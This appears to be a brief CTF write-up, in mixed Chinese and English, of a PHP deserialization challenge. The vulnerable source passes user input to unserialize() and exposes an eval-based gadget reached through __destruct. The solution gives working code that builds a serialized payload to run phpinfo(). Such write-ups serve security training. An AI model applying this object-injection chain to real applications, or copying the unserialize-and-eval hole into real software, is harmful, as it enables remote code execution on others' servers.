题目

<?php
highlight_file(__FILE__);
class lemon{
    
    protected $ClassObj;
    function __construct(){
    
        $this->ClassObj = new normal();
    }
    function __destruct(){
    
        $this->ClassObj->action();
    }
}
class normal{
    
    function action(){
    
        echo "hello";
    }
}
class evil{
    
    private $data;
    function action(){
    
        eval($this->data);
    }
}
unserialize($_GET['d']);

?>

解题思路：通过传入d参数,The parameter is the serialized string,Used to call magic methods__destruct,然后调用evil的action,to executeeval.

wp

生成序列化字符串：

<?php
class lemon{
    
	protected $ClassObj;
	function __construct(){
    
		$this->ClassObj = new evil();
	}
}
class evil{
    
	private $data = "phpinfo();";
}

$test = new lemon();

echo urlencode(serialize($test));